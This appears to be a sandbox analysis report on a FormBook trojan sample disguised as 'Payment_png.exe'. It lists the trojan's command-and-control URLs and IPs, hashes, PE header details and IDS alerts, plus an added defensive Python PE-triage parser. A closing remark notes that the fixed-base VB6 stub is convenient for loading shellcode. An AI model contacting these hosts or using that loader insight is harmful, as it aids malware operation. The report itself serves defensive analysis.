http://www.aainakari.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.plowbrothers.com/c8bs/www.slutefuter.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.booksfall.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.domennyarendi39.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.aainakari.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.loversdeal.com/c8bs/www.booksfall.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.uforservice.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.uforservice.com/c8bs/www.domennyarendi39.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.plowbrothers.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.pcpartout.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.choupisson.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.domentemenegi42.net/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.broskiusa.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.accinf5.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.domennyarendi39.net/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.domennyarendi39.netReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.choupisson.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slutefuter.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.choupisson.com/c8bs/www.uforservice.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bostonm.info/c8bs/www.quantify-co.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slutefuter.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.booksfall.com/c8bs/www.pcpartout.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.broskiusa.com/c8bs/www.aainakari.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.broskiusa.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.loversdeal.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.loversdeal.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.domentemenegi42.netReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bostonm.infoReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slutefuter.com/c8bs/www.loversdeal.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quantify-co.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.booksfall.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.accinf5.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pcpartout.com/c8bs/ | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.uforservice.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.broskiusa.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.net | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quantify-co.com/c8bs/M | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.birkenhof-allgaeu.netReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.domentemenegi42.net/c8bs/www.broskiusa.com | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bostonm.info | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quantify-co.comReferer: | explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

Map legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.117.218 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
217.160.0.233 | www.birkenhof-allgaeu.net | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
170.249.199.106 | aps-mm.com | United States | 63410 | PRIVATESYSTEMSUS | false
34.102.136.180 | plowbrothers.com | United States | 15169 | GOOGLEUS | false
66.96.160.133 | www.choupisson.com | United States | 29873 | BIZLAND-SDUS | true
23.227.38.32 | uforservice.com | Canada | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 377352
Start date: 29.03.2021
Start time: 13:57:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Payment_png.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@13/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 50.2% (good quality ratio 43.6%)
• Quality average: 71.5%
• Quality standard deviation: 33.4%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 40.88.32.150, 104.43.139.144, 184.30.20.56, 20.50.102.62, 13.88.21.125, 2.20.142.210, 2.20.142.209, 20.190.160.129, 20.190.160.71, 20.190.160.134, 20.190.160.6, 20.190.160.69, 20.190.160.4, 20.190.160.132, 20.190.160.73, 93.184.220.29, 92.122.213.194, 92.122.213.247, 172.67.184.37, 104.21.51.189, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, www.booksfall.com.cdn.cloudflare.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs


                                                          Domains


                                                          ASN


                                                          JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.377414770988995
TrID:
• Win32 Executable (generic) a (10002005/4) 99.15%
• Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Payment_png.exe
File size: 98304
MD5: 86fa26e33879d3c04152301eaaaba518
SHA1: 3c75755b8efe897bb18ea99f6014dabd5492d32c
SHA256: eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
SHA512: 29e5f47bcee495a43b7e97383080f965e18eb7eda93b69fbd06e65fd6b1e47f3b9e898b4574e41818aed4b0014961cdd2741d75a5b34ffd51dbad06c23f44ab5
SSDEEP: 1536:nle5CD3/URwKGIOzE7YUzlDX0UEeQpe5:lBrURwUOzQYk5ZQp
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....PW.................@...@......x........P....@................

File Icon

Icon Hash: 11d0cca988e43480

Static PE Info

General

Entrypoint: 0x401378
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: (none: neither DYNAMIC_BASE nor NX_COMPAT is set, and with relocations stripped the image always loads at 0x400000, so its addresses are not randomised by ASLR)
Time Stamp: 0x5750A3D1 [Thu Jun 2 21:23:29 2016 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none; not a .NET assembly)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: a8b86b6cb5a304f5649372dc4fc7de67

Entrypoint Preview

Instruction (linear disassembly from the entrypoint; the first two lines are the standard Visual Basic 6 stub, a push of the VB header address followed by a call into the MSVBVM60 runtime entry. The bytes after that call are the VB header structure itself, so the remaining lines are data decoded as instructions and do not represent executed code.)
                                                          push 00402B68h
                                                          call 00007FEA74E5A533h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          inc eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edi+531D74E3h], al
                                                          mov byte ptr [ebp+4Eh], ch
                                                          scasb
                                                          fistp word ptr [edx-0FD75C92h]
                                                          retf
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          arpl word ptr [edx], bx
                                                          add edx, dword ptr [eax+61h]
                                                          insb
                                                          jnc 00007FEA74E5A5BBh
                                                          imul ebp, dword ptr [esi+67h], 00410800h
                                                          and byte ptr [eax], cl
                                                          inc ecx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add bh, bh
                                                          int3
                                                          xor dword ptr [eax], eax
                                                          or esi, dword ptr [edx+67663E8Bh]
                                                          psadbw mm0, qword ptr [edi-4Eh]
                                                          stosb
                                                          aam DAh
                                                          fld tbyte ptr [edi+ebp*2-38C0617Ch]
                                                          mov ch, 43h
                                                          mov al, byte ptr [B594427Ch]
                                                          adc dword ptr [ebp+0F563441h], 3Ah
                                                          dec edi
                                                          lodsd
                                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                                          or al, 00h
                                                          stosb
                                                          add byte ptr [eax-2Dh], ah
                                                          xchg eax, ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          sbb eax, 65000017h
                                                          adc eax, 0E000000h
                                                          add byte ptr [ebx+75h], dh
                                                          bound esp, dword ptr [ecx+73h]
                                                          jnc 00007FEA74E5A5B1h
                                                          arpl word ptr [ecx+61h], bp
                                                          je 00007FEA74E5A5ABh
                                                          jbe 00007FEA74E5A5A7h
                                                          add byte ptr [66000701h], cl

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14204 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x1974 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 | (in headers)
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x128 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x13790 | 0x14000 | False | 0.309924316406 | data | 5.74216036023 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x15000 | 0x11b4 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x17000 | 0x1974 | 0x2000 | False | 0.513793945312 | data | 4.5489451124 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x180cc | 0x8a8 | data | |
RT_ICON | 0x17a04 | 0x6c8 | data | |
RT_ICON | 0x1749c | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x1746c | 0x30 | data | |
RT_VERSION | 0x17150 | 0x31c | data | English | United States

Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaInStrB, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr
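The values in the Static PE Info, Entrypoint Preview, Sections and Imports tables above (entrypoint VA, characteristics flags, per-section entropy, the VB6 stub whose imports come from MSVBVM60.DLL) are derived from the file headers. The following is an added example, not Joe Sandbox code and not taken from the sample: a standard-library-only PE32 triage parser that reproduces those derivations and recognises the `push <VBHeader>; call ThunRTMain` stub by checking that the pushed address points at the `VB5!` magic. `build_sample_pe()` returns a constructed minimal PE for the demonstration; its addresses (0x401020 for the VB header, a 0x200-byte `.text` section) are assumptions, while the timestamp 0x5750A3D1 and characteristics 0x010F are the report's own values.

```python
"""Static triage of a PE32 file with the standard library only (added example)."""
import math
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {            # IMAGE_FILE_HEADER.Characteristics
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {             # IMAGE_OPTIONAL_HEADER.DllCharacteristics (mitigations)
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x4000: "GUARD_CF",
}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the scale the report's Entropy column uses."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32(data: bytes) -> dict:
    """Read the COFF header, the PE32 optional-header fields used in triage and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsect, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr, "chars": sc,
                         "entropy": round(entropy(data[rawptr:rawptr + rawsize]), 3)})
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "entrypoint_rva": entry_rva, "image_base": image_base, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "sections": sections}


def rva_to_offset(pe: dict, rva: int):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["rawptr"] + (rva - s["va"])
    return None


def vb6_header_va(data: bytes, pe: dict):
    """Recognise the VB6 stub `push imm32; call rel32` (opcodes 68 / E8) at the entrypoint and
    confirm the pushed VA points at a VB header starting with 'VB5!'.  The bytes after that
    call ARE this header, which is why a linear disassembly of the entrypoint turns to noise."""
    off = rva_to_offset(pe, pe["entrypoint_rva"])
    if off is None or data[off] != 0x68 or data[off + 5] != 0xE8:
        return None
    header_va = struct.unpack_from("<I", data, off + 1)[0]
    hdr = rva_to_offset(pe, header_va - pe["image_base"])
    if hdr is None or data[hdr:hdr + 4] != b"VB5!":
        return None
    return header_va


def triage(data: bytes) -> dict:
    pe = parse_pe32(data)
    relocs_stripped = bool(pe["characteristics"] & 0x0001)
    dynamic_base = bool(pe["dll_characteristics"] & 0x0040)
    return {
        "timestamp": datetime.fromtimestamp(pe["timestamp"], timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entrypoint": hex(pe["image_base"] + pe["entrypoint_rva"]),
        "characteristics": flag_names(pe["characteristics"], FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(pe["dll_characteristics"], DLL_CHARACTERISTICS),
        # Without DYNAMIC_BASE, or with relocations stripped, the image always maps at
        # ImageBase, so every address inside it is stable across victim machines.
        "aslr": dynamic_base and not relocs_stripped,
        "vb6_header_va": vb6_header_va(data, pe),
        "sections": [(s["name"], hex(s["va"]), s["entropy"]) for s in pe["sections"]],
    }


def build_sample_pe() -> bytes:
    """CONSTRUCTED minimal PE32 with one .text section mimicking a VB6 stub (assumed values)."""
    text = bytearray(0x200)
    text[0:5] = b"\x68" + struct.pack("<I", 0x401020)            # push 0x401020  (VBHeader VA)
    text[5:10] = b"\xE8" + struct.pack("<i", 0)                   # call rel32     (target unused here)
    text[0x20:0x24] = b"VB5!"                                      # VBHeader.szVbMagic
    text[0x40:] = bytes(i & 0xFF for i in range(0x200 - 0x40))     # filler so the entropy is non-trivial
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x5750A3D1, 0, 0, 224, 0x010F)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # SectionAlignment, FileAlignment
    struct.pack_into("<HH", opt, 68, 2, 0x0000)                    # GUI subsystem, DllCharacteristics = 0
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0") + bytes(text)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run against a real file with `triage(open(path, "rb").read())`. The `aslr` field is the check worth keeping on a triage sheet: a 32-bit image with no `DYNAMIC_BASE` and `RELOCS_STRIPPED`, as in the table above, sits at a fixed base, which is one reason a VB6 stub is a convenient loader for position-dependent shellcode.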

Version Infos

Description | Data
Translation | 0x0409 0x04b0
LegalCopyright | Copyright Singapore
InternalName | tempelhallerne
FileVersion | 3.01
CompanyName | Singapore Lin
LegalTrademarks | Copyright Singapore
ProductName | Farmor2
ProductVersion | 3.01
FileDescription | Singapore Lin
OriginalFilename | tempelhallerne.exe

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/29/21-13:59:15.924201 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 34.102.136.180
03/29/21-13:59:15.924201 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 34.102.136.180
03/29/21-13:59:15.924201 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 34.102.136.180
03/29/21-13:59:16.123062 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49734 | 34.102.136.180 | 192.168.2.3
03/29/21-13:59:32.253784 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.3 | 172.67.184.37
